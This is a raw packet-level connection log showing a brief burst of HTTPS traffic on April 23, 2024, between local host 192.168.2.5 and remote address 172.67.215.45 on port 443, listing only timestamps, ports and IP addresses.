Apr 23, 2024 07:53:28.921770096 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.003119946 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.003204107 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.003611088 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.003662109 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.004327059 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.004390955 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.005039930 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.005098104 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.005292892 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.005353928 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.005558014 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.005609035 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.006622076 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.006681919 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.006745100 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.006802082 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.007143021 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.007203102 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.007747889 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.007814884 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.008210897 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.008261919 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.008474112 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.008527994 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.008820057 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.008882999 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.009238005 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.009300947 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.009579897 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.009634972 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.009845018 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.009903908 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.010212898 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.010267973 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.010437965 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.010493040 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.010855913 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.010910988 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.010965109 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.011013985 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.011420012 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.011476040 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.012157917 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.012178898 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.012223959 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.012249947 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.012301922 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.012315035 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.012352943 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.013628006 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.013670921 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.013699055 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.013712883 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.013737917 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.013758898 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.015228033 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.015269041 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.015305042 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.015312910 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.015356064 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.016695976 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.016742945 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.016777039 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.016784906 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.016817093 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.016843081 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.018059969 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.018105984 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.018131971 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.018145084 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.018157959 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.018182039 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.018939018 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.018960953 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.019855976 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.019900084 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.019925117 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.019942999 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.019968987 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.019989967 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.022061110 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.022104979 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.022130966 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.022141933 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.022173882 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.022197008 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.023214102 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.023257017 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.023288012 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.023296118 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.023332119 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.023359060 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.024415016 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.024460077 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.024487972 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.024494886 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.024518967 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.024538994 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.092453003 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.092505932 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.092540979 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.092551947 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.092586994 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.094280005 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.094325066 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.094355106 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.094362020 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.094393969 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.094418049 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.096425056 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.096468925 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.096494913 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.096503019 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.096539021 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.096556902 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.098840952 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.098856926 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.098905087 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.098912001 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.098943949 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.100682020 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.100698948 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.100754976 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.100761890 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.100820065 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.102288008 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.102303028 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.102379084 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.102385998 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.102440119 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.104820967 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.104839087 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.104895115 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.104902983 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.104939938 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.106528044 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.106544018 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.106595993 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.106604099 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.106638908 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.106653929 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.109097004 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.109113932 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.109164953 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.109179020 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.109215021 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.109241009 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.111120939 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.111138105 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.111196041 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.111202955 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.111246109 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.112368107 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.112385988 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.112441063 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.112448931 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.112493992 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.112493992 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.113390923 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.113408089 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.113445044 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.113451958 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.113483906 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.113547087 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.114456892 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.114475012 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.114516020 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.114522934 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.114554882 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.114577055 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.115638971 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.115654945 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.115736961 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.115736961 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.115745068 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.115798950 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.116638899 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.116660118 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.116708040 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.116714954 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.116751909 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.117831945 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.117851019 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.117922068 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.117928982 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.117965937 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.119066954 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.119082928 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.119142056 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.119148016 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.119182110 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.119195938 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.120301008 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.120318890 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.120369911 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.120377064 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.120402098 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.120425940 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.121396065 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.121412039 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.121444941 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.121452093 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.121489048 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.122514009 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.122530937 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.122577906 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.122584105 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.122618914 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.122637987 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.123631954 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.123660088 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.123691082 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.123697042 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.123737097 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.124927044 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.124943972 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.124982119 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.124989033 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.125035048 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.125035048 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.127046108 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.127063036 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.127109051 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.127115965 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.127162933 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.127973080 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.128015995 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.128029108 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.128034115 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.128070116 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.128078938 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.129987955 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.130009890 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.130067110 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.130074024 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.131323099 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.131345987 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.131378889 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.131387949 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.131428003 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.132560015 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.132579088 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.132613897 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.132621050 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.132654905 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.132678032 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.179970026 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.179990053 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.180036068 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.180042982 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.180089951 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.182545900 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.182564020 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.182604074 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.182610989 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.182652950 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.185363054 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.185380936 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.185452938 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.185461044 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.185514927 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.188513994 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.188530922 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.188589096 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.188596964 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.188627005 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.188652992 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.189357042 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.189373016 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.189409018 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.189419985 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.189443111 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.189466000 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.190290928 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.190308094 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.190356970 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.190363884 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.190397978 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.191421986 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.191438913 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.191487074 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.191494942 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.191541910 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.192293882 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.192311049 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.192357063 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.192363977 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.192395926 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.192419052 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.193593025 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.193608046 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.193650007 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.193656921 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.193690062 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.193713903 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.194420099 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.194439888 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.194478989 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.194487095 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.194519997 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.194535971 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.195358992 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.195374012 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.195434093 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.195441961 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.195501089 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.196111917 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.196126938 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.196171999 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.196178913 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.196197033 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.196214914 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.198400974 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.198419094 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.198460102 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.198467016 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.198502064 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.198520899 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.200767040 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.200788021 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.200853109 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.200860023 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.200892925 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.201752901 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.201769114 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.201802015 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.201811075 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.201837063 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.201850891 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.203185081 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.203202009 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.203244925 CEST	49731	443	192.168.2.5	172.67.215.45
